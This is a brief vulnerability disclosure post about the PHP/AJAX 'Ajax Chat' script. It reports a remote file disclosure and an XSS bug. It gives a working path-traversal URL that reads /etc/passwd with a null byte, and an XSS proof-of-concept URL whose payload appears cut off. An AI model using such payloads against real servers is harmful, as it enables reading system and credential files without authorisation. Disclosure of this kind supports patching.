Discovered by Sirdarckcat from elhacker.net Ajax Chat http://www.pcdiscs.co.uk/chat/ ============================================== Ajax Chat is a web script for making an online chat based on PHP and AJAX. This has a Remote File Disclosure and a XSS bug. ============================================== RFD PoC: http://www.server.com/includes/operator_chattranscript.php?chatid=../../../../../../etc/passwd%00 ============================================== XSS PoC: http://www.server.com/visitor/livesupport/chat.php?userid= ============================================== Att. Sirdarckcat elhacker.net